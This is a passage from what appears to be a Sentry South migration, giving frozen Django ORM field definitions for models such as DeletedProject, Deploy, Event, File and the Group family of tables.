'actor_id': ('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {'null': 'True'}),
'actor_key': ('django.db.models.fields.CharField', [], {'max_length': '32', 'null': 'True'}),
'actor_label': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True'}),
'date_created': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'date_deleted': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'ip_address': ('django.db.models.fields.GenericIPAddressField', [], {'max_length': '39', 'null': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True'}),
'reason': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'slug': ('django.db.models.fields.CharField', [], {'max_length': '50', 'null': 'True'})
},
'sentry.deletedproject': {
'Meta': {'unique_together': '()', 'object_name': 'DeletedProject', 'index_together': '()'},
'actor_id': ('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {'null': 'True'}),
'actor_key': ('django.db.models.fields.CharField', [], {'max_length': '32', 'null': 'True'}),
'actor_label': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True'}),
'date_created': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'date_deleted': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'ip_address': ('django.db.models.fields.GenericIPAddressField', [], {'max_length': '39', 'null': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True'}),
'organization_id': ('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {'null': 'True'}),
'organization_name': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True'}),
'organization_slug': ('django.db.models.fields.CharField', [], {'max_length': '50', 'null': 'True'}),
'platform': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True'}),
'reason': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'slug': ('django.db.models.fields.CharField', [], {'max_length': '50', 'null': 'True'})
},
'sentry.deletedteam': {
'Meta': {'unique_together': '()', 'object_name': 'DeletedTeam', 'index_together': '()'},
'actor_id': ('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {'null': 'True'}),
'actor_key': ('django.db.models.fields.CharField', [], {'max_length': '32', 'null': 'True'}),
'actor_label': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True'}),
'date_created': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'date_deleted': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'ip_address': ('django.db.models.fields.GenericIPAddressField', [], {'max_length': '39', 'null': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True'}),
'organization_id': ('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {'null': 'True'}),
'organization_name': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True'}),
'organization_slug': ('django.db.models.fields.CharField', [], {'max_length': '50', 'null': 'True'}),
'reason': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'slug': ('django.db.models.fields.CharField', [], {'max_length': '50', 'null': 'True'})
},
'sentry.deploy': {
'Meta': {'unique_together': '()', 'object_name': 'Deploy', 'index_together': '()'},
'date_finished': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'date_started': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'environment_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'db_index': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True', 'blank': 'True'}),
'notified': ('django.db.models.fields.NullBooleanField', [], {'default': 'False', 'null': 'True', 'db_index': 'True', 'blank': 'True'}),
'organization_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'db_index': 'True'}),
'release': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Release']"}),
'url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'})
},
'sentry.discoversavedquery': {
'Meta': {'unique_together': '()', 'object_name': 'DiscoverSavedQuery', 'index_together': '()'},
'created_by': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.User']", 'null': 'True', 'on_delete': 'models.SET_NULL'}),
'date_created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'date_updated': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'organization': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Organization']"}),
'projects': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['sentry.Project']", 'through': "orm['sentry.DiscoverSavedQueryProject']", 'symmetrical': 'False'}),
'query': ('sentry.db.models.fields.jsonfield.JSONField', [], {'default': '{}'})
},
'sentry.discoversavedqueryproject': {
'Meta': {'unique_together': "(('project', 'discover_saved_query'),)", 'object_name': 'DiscoverSavedQueryProject', 'index_together': '()'},
'discover_saved_query': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.DiscoverSavedQuery']"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']"})
},
'sentry.distribution': {
'Meta': {'unique_together': "(('release', 'name'),)", 'object_name': 'Distribution', 'index_together': '()'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'organization_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'db_index': 'True'}),
'release': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Release']"})
},
'sentry.email': {
'Meta': {'unique_together': '()', 'object_name': 'Email', 'index_together': '()'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('sentry.db.models.fields.citext.CIEmailField', [], {'unique': 'True', 'max_length': '75'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'})
},
'sentry.environment': {
'Meta': {'unique_together': "(('organization_id', 'name'),)", 'object_name': 'Environment', 'index_together': '()'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'organization_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {}),
'project_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'null': 'True'}),
'projects': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['sentry.Project']", 'through': "orm['sentry.EnvironmentProject']", 'symmetrical': 'False'})
},
'sentry.environmentproject': {
'Meta': {'unique_together': "(('project', 'environment'),)", 'object_name': 'EnvironmentProject', 'index_together': '()'},
'environment': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Environment']"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'is_hidden': ('django.db.models.fields.NullBooleanField', [], {'null': 'True', 'blank': 'True'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']"})
},
'sentry.event': {
'Meta': {'unique_together': "(('project_id', 'event_id'),)", 'object_name': 'Event', 'db_table': "'sentry_message'", 'index_together': "(('group_id', 'datetime'),)"},
'data': ('sentry.db.models.fields.node.NodeField', [], {'null': 'True', 'blank': 'True'}),
'datetime': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'db_index': 'True'}),
'event_id': ('django.db.models.fields.CharField', [], {'max_length': '32', 'null': 'True', 'db_column': "'message_id'"}),
'group_id': ('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {'null': 'True', 'blank': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'message': ('django.db.models.fields.TextField', [], {}),
'platform': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True'}),
'project_id': ('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {'null': 'True', 'blank': 'True'}),
'time_spent': ('sentry.db.models.fields.bounded.BoundedIntegerField', [], {'null': 'True'})
},
'sentry.eventattachment': {
'Meta': {'unique_together': "(('project_id', 'event_id', 'file'),)", 'object_name': 'EventAttachment', 'index_together': "(('project_id', 'date_added'),)"},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'db_index': 'True'}),
'event_id': ('django.db.models.fields.CharField', [], {'max_length': '32', 'db_index': 'True'}),
'file': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.File']"}),
'group_id': ('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {'null': 'True', 'db_index': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.TextField', [], {}),
'project_id': ('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {})
},
'sentry.eventmapping': {
'Meta': {'unique_together': "(('project_id', 'event_id'),)", 'object_name': 'EventMapping', 'index_together': '()'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'event_id': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'group_id': ('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'project_id': ('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {})
},
'sentry.eventprocessingissue': {
'Meta': {'unique_together': "(('raw_event', 'processing_issue'),)", 'object_name': 'EventProcessingIssue', 'index_together': '()'},
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'processing_issue': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.ProcessingIssue']"}),
'raw_event': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.RawEvent']"})
},
'sentry.eventtag': {
'Meta': {'unique_together': "(('event_id', 'key_id', 'value_id'),)", 'object_name': 'EventTag', 'index_together': "(('group_id', 'key_id', 'value_id'),)"},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'db_index': 'True'}),
'event_id': ('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {}),
'group_id': ('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {'null': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'key_id': ('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {}),
'project_id': ('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {}),
'value_id': ('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {})
},
'sentry.eventuser': {
'Meta': {'unique_together': "(('project_id', 'ident'), ('project_id', 'hash'))", 'object_name': 'EventUser', 'index_together': "(('project_id', 'email'), ('project_id', 'username'), ('project_id', 'ip_address'))"},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'db_index': 'True'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'null': 'True'}),
'hash': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'ident': ('django.db.models.fields.CharField', [], {'max_length': '128', 'null': 'True'}),
'ip_address': ('django.db.models.fields.GenericIPAddressField', [], {'max_length': '39', 'null': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '128', 'null': 'True'}),
'project_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'db_index': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'max_length': '128', 'null': 'True'})
},
'sentry.externalissue': {
'Meta': {'unique_together': "(('organization_id', 'integration_id', 'key'),)", 'object_name': 'ExternalIssue', 'index_together': '()'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'description': ('django.db.models.fields.TextField', [], {'null': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'integration_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'metadata': ('sentry.db.models.fields.jsonfield.JSONField', [], {'null': 'True'}),
'organization_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {}),
'title': ('django.db.models.fields.TextField', [], {'null': 'True'})
},
'sentry.featureadoption': {
'Meta': {'unique_together': "(('organization', 'feature_id'),)", 'object_name': 'FeatureAdoption', 'index_together': '()'},
'applicable': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'complete': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'data': ('sentry.db.models.fields.jsonfield.JSONField', [], {'default': '{}'}),
'date_completed': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'feature_id': ('django.db.models.fields.PositiveIntegerField', [], {}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'organization': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Organization']"})
},
'sentry.file': {
'Meta': {'unique_together': '()', 'object_name': 'File', 'index_together': '()'},
'blob': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'related_name': "u'legacy_blob'", 'null': 'True', 'to': "orm['sentry.FileBlob']"}),
'blobs': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['sentry.FileBlob']", 'through': "orm['sentry.FileBlobIndex']", 'symmetrical': 'False'}),
'checksum': ('django.db.models.fields.CharField', [], {'max_length': '40', 'null': 'True', 'db_index': 'True'}),
'headers': ('sentry.db.models.fields.jsonfield.JSONField', [], {'default': '{}'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.TextField', [], {}),
'path': ('django.db.models.fields.TextField', [], {'null': 'True'}),
'size': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'null': 'True'}),
'timestamp': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'db_index': 'True'}),
'type': ('django.db.models.fields.CharField', [], {'max_length': '64'})
},
'sentry.fileblob': {
'Meta': {'unique_together': '()', 'object_name': 'FileBlob', 'index_together': '()'},
'checksum': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '40'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'path': ('django.db.models.fields.TextField', [], {'null': 'True'}),
'size': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'null': 'True'}),
'timestamp': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'db_index': 'True'})
},
'sentry.fileblobindex': {
'Meta': {'unique_together': "(('file', 'blob', 'offset'),)", 'object_name': 'FileBlobIndex', 'index_together': '()'},
'blob': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.FileBlob']"}),
'file': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.File']"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'offset': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {})
},
'sentry.fileblobowner': {
'Meta': {'unique_together': "(('blob', 'organization'),)", 'object_name': 'FileBlobOwner', 'index_together': '()'},
'blob': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.FileBlob']"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'organization': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Organization']"})
},
'sentry.group': {
'Meta': {'unique_together': "(('project', 'short_id'),)", 'object_name': 'Group', 'db_table': "'sentry_groupedmessage'", 'index_together': "(('project', 'first_release'),)"},
'active_at': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'db_index': 'True'}),
'culprit': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True', 'db_column': "'view'", 'blank': 'True'}),
'data': ('sentry.db.models.fields.gzippeddict.GzippedDictField', [], {'null': 'True', 'blank': 'True'}),
'first_release': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Release']", 'null': 'True', 'on_delete': 'models.PROTECT'}),
'first_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'db_index': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'is_public': ('django.db.models.fields.NullBooleanField', [], {'default': 'False', 'null': 'True', 'blank': 'True'}),
'last_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'db_index': 'True'}),
'level': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '40', 'db_index': 'True', 'blank': 'True'}),
'logger': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '64', 'db_index': 'True', 'blank': 'True'}),
'message': ('django.db.models.fields.TextField', [], {}),
'num_comments': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0', 'null': 'True'}),
'platform': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']", 'null': 'True'}),
'resolved_at': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'db_index': 'True'}),
'score': ('sentry.db.models.fields.bounded.BoundedIntegerField', [], {'default': '0'}),
'short_id': ('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {'null': 'True'}),
'status': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0', 'db_index': 'True'}),
'time_spent_count': ('sentry.db.models.fields.bounded.BoundedIntegerField', [], {'default': '0'}),
'time_spent_total': ('sentry.db.models.fields.bounded.BoundedIntegerField', [], {'default': '0'}),
'times_seen': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '1', 'db_index': 'True'})
},
'sentry.groupassignee': {
'Meta': {'unique_together': '()', 'object_name': 'GroupAssignee', 'db_table': "'sentry_groupasignee'", 'index_together': '()'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'group': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'related_name': "u'assignee_set'", 'unique': 'True', 'to': "orm['sentry.Group']"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'related_name': "u'assignee_set'", 'to': "orm['sentry.Project']"}),
'team': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'related_name': "u'sentry_assignee_set'", 'null': 'True', 'to': "orm['sentry.Team']"}),
'user': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'related_name': "u'sentry_assignee_set'", 'null': 'True', 'to': "orm['sentry.User']"})
},
'sentry.groupbookmark': {
'Meta': {'unique_together': "(('project', 'user', 'group'),)", 'object_name': 'GroupBookmark', 'index_together': '()'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'null': 'True'}),
'group': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'related_name': "u'bookmark_set'", 'to': "orm['sentry.Group']"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'related_name': "u'bookmark_set'", 'to': "orm['sentry.Project']"}),
'user': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'related_name': "u'sentry_bookmark_set'", 'to': "orm['sentry.User']"})
},
'sentry.groupcommitresolution': {
'Meta': {'unique_together': "(('group_id', 'commit_id'),)", 'object_name': 'GroupCommitResolution', 'index_together': '()'},
'commit_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'db_index': 'True'}),
'datetime': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'db_index': 'True'}),
'group_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'})
},
'sentry.groupemailthread': {
'Meta': {'unique_together': "(('email', 'group'), ('email', 'msgid'))", 'object_name': 'GroupEmailThread', 'index_together': '()'},
'date': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'db_index': 'True'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75'}),
'group': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'related_name': "u'groupemail_set'", 'to': "orm['sentry.Group']"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'msgid': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'related_name': "u'groupemail_set'", 'to': "orm['sentry.Project']"})
},
'sentry.groupenvironment': {
'Meta': {'unique_together': "(('group', 'environment'),)", 'object_name': 'GroupEnvironment', 'index_together': "(('environment', 'first_release'),)"},
'environment': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Environment']"}),
'first_release': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Release']", 'null': 'True', 'on_delete': 'models.DO_NOTHING'}),
'first_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'null': 'True', 'db_index': 'True'}),
'group': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Group']"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'})
},
'sentry.grouphash': {
'Meta': {'unique_together': "(('project', 'hash'),)", 'object_name': 'GroupHash', 'index_together': '()'},
'group': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Group']", 'null': 'True'}),
'group_tombstone_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'null': 'True', 'db_index': 'True'}),
'hash': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']", 'null': 'True'}),
'state': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'null': 'True'})
},
'sentry.grouplink': {
'Meta': {'unique_together': "(('group_id', 'linked_type', 'linked_id'),)", 'object_name': 'GroupLink', 'index_together': '()'},
'data': ('sentry.db.models.fields.jsonfield.JSONField', [], {'default': '{}'}),
'datetime': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'db_index': 'True'}),
'group_id': ('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'linked_id': ('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {}),
'linked_type': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '1'}),
'project_id': ('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {'db_index': 'True'}),
'relationship': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '2'})
},
'sentry.groupmeta': {
'Meta': {'unique_together': "(('group', 'key'),)", 'object_name': 'GroupMeta', 'index_together': '()'},
'group': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Group']"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'value': ('django.db.models.fields.TextField', [], {})
},
'sentry.groupredirect': {
'Meta': {'unique_together': '()', 'object_name': 'GroupRedirect', 'index_together': '()'},
'group_id': ('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {'db_index': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'previous_group_id': ('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {'unique': 'True'})
},
'sentry.grouprelease': {
'Meta': {'unique_together': "(('group_id', 'release_id', 'environment'),)", 'object_name': 'GroupRelease', 'index_together': '()'},
'environment': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '64'}),
'first_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'group_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'last_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'db_index': 'True'}),
'project_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'db_index': 'True'}),
'release_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'db_index': 'True'})
},
'sentry.groupresolution': {
'Meta': {'unique_together': '()', 'object_name': 'GroupResolution', 'index_together': '()'},
'actor_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'null': 'True'}),
'datetime': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'db_index': 'True'}),
'group': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Group']", 'unique': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'release': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Release']"}),
'status': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0'}),
'type': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'null': 'True'})
},
'sentry.grouprulestatus': {
'Meta': {'unique_together': "(('rule', 'group'),)", 'object_name': 'GroupRuleStatus', 'index_together': '()'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'group': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Group']"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'last_active': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']"}),
'rule': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Rule']"}),
'status': ('django.db.models.fields.PositiveSmallIntegerField', [], {'default': '0'})
},
'sentry.groupseen': {
'Meta': {'unique_together': "(('user', 'group'),)", 'object_name': 'GroupSeen', 'index_together': '()'},
'group': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Group']"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'last_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']"}),
'user': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.User']", 'db_index': 'False'})
},
'sentry.groupshare': {
'Meta': {'unique_together': '()', 'object_name': 'GroupShare', 'index_together': '()'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'group': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Group']", 'unique': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']"}),
'user': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.User']", 'null': 'True'}),
'uuid': ('django.db.models.fields.CharField', [], {'default': "'993f599bf9114fe1b88e46386a3514da'", 'unique': 'True', 'max_length': '32'})
},
'sentry.groupsnooze': {
'Meta': {'unique_together': '()', 'object_name': 'GroupSnooze', 'index_together': '()'},
'actor_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'null': 'True'}),
'count': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'null': 'True'}),
'group': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Group']", 'unique': 'True'}),
